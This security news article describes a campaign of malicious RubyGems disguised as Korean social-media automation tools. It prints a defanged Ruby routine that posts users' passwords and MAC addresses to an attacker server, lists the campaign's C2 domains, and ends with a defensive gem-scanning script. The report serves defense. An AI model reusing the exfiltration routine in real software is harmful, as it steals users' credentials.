Threat actors began slipping malicious code into legitimate RubyGems packages, disguising infostealers as social media automation tools, in early 2023.
Over the past two years, attackers operating under aliases such as zon, nowon, kwonsoonje, and soonje have published more than 60 gems that deliver the promised automation features (bulk posting, engagement amplification, and backlink creation) while covertly harvesting credentials.
These packages target platforms including Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver, and have been downloaded over 275,000 times, with installs persisting on machines long after individual gems are removed from the public index.
Socket.dev analysts noted that each malicious gem contains a lightweight graphical interface built with Glimmer-DSL-LibUI, presented in Korean to appeal to South Korean grey-hat marketers.
On launch, users encounter prompts labeled “아이디” (ID) and “비밀번호” (password), encouraging them to enter account credentials under the guise of a legitimate login for the automation service.
Instead of forwarding these details to the legitimate APIs, the gems immediately exfiltrate the credentials and the host's MAC address to attacker-controlled servers via HTTP POST requests.
The domains programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr, and seven1.iwinv[.]web host PHP bulletin board endpoints that silently accept the stolen data.
The campaign's evolution demonstrates a sophisticated supply chain compromise. Gems published under the zon alias are often “yanked” (removed from RubyGems) within days, only to be mirrored in continuous integration caches and redistributed under new names by the same actor.
Screenshot from marketingduo[.]co[.]kr showing the Korean-language interface for bulk messaging tools (Source – Socket.dev)
Despite periodic infrastructure shifts, the core credential-stealing routine remains unchanged, enabling persistent fingerprinting of infected hosts.
This approach exploits grey-hat marketers' reliance on disposable accounts; victims rarely report breaches, opting instead to abandon compromised identities and continue operations without suspicion.
Infection Mechanism and Exfiltration Workflow
The malicious iuz-64bit gem exemplifies the infection mechanism shared across the cluster.
After presenting its GUI, the gem invokes a function that collects the user's input and system identifiers before performing an HTTP POST to the attacker's C2 endpoint.
The defanged Ruby snippet below illustrates the process:
require 'http'   # the gem uses the http gem's HTTP.post for exfiltration
require 'json'

def login_check2(user_id, user_pw)
  url = "" # C2 endpoint (defanged; the URL is omitted from the published snippet)
  headers = { 'Content-Type' => 'application/json' }
  mac = get_mac_address() # host MAC address, used to fingerprint the infected machine
  body = {
    username: user_id,
    password: user_pw,
    macAddress: mac,
    program: '인스타 자동 포스팅(업로드) 프로그램'
  }.to_json
  # Credentials and MAC address are posted straight to the attacker's server
  response = HTTP.post(url, headers: headers, body: body)
  payload = JSON.parse(response.body.to_s)
  payload['status'] == "0" ? "0" : payload['message']
end
Annotated code snippet from the iuz-64bit gem illustrating credential exfiltration (Source – Socket.dev)
Once credentials and MAC addresses reach the C2 server, the attacker can correlate installations across the various gem clusters, monitor tool distribution, and maintain long-term access.
This dual-use model lets grey-hat marketers automate spam and SEO campaigns while surreptitiously funneling sensitive data to the threat actor.
As the campaign persists, defenders should integrate real-time dependency scanning and install-time alerts to detect and block these malicious packages before they infiltrate development environments.
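One way to approximate such an install-time check, as an added example that is not part of the Socket.dev report or of any gem discussed here: the script below walks the gems installed in the current Ruby environment and flags source files that reference the campaign's domains, or that collect a password together with a MAC address and post it over HTTP. The domain list is copied from the indicators above; the regexes for credential keys and HTTP clients are assumed heuristics, not signatures from the report.

```ruby
require 'rubygems'

# Indicators from the campaign described above. The domains are the defanged
# values quoted in the article; brackets are stripped only so they match source.
C2_DOMAINS = ['programzon[.]com', 'appspace[.]kr', 'marketingduo[.]co[.]kr',
              'seven1.iwinv[.]web'].map { |d| d.delete('[]') }.freeze

# Behavioural markers of the exfiltration routine (assumed heuristics): a
# password collected alongside a MAC address, and an HTTP POST that ships it.
CRED_KEYS = [/password/i, /mac_?address/i].freeze
POST_CALL = /\b(HTTP|Net::HTTP|HTTParty|Faraday)\.post\b|Net::HTTP::Post\b/

# Inspects one Ruby source text and returns a list of human-readable findings
# (empty when nothing matched).
def inspect_source(src)
  findings = []
  lowered = src.downcase
  C2_DOMAINS.each { |d| findings << "known C2 domain: #{d}" if lowered.include?(d) }
  creds = CRED_KEYS.all? { |re| src.match?(re) }
  findings << 'password and MAC address collected together' if creds
  findings << 'credentials posted over HTTP' if creds && src.match?(POST_CALL)
  findings
end

# Walks every gem installed in the current Ruby environment and reports the
# files that matched, as { "name-version" => { path => findings } }.
def scan_installed_gems
  report = {}
  Gem::Specification.each do |spec|
    Dir.glob(File.join(spec.full_gem_path, '**', '*.rb')).each do |path|
      src = begin
        File.binread(path).force_encoding('UTF-8').scrub # tolerate odd encodings
      rescue SystemCallError
        next
      end
      hits = inspect_source(src)
      (report[spec.full_name] ||= {})[path] = hits unless hits.empty?
    end
  end
  report
end

if __FILE__ == $PROGRAM_NAME
  scan_installed_gems.each do |gem_name, files|
    puts gem_name
    files.each { |path, hits| puts "  #{path}: #{hits.join('; ')}" }
  end
end
```

A hit on the domain list is a strong indicator; the behavioural markers alone will also fire on legitimate network tooling, so treat them as a prompt for manual review rather than an automatic block.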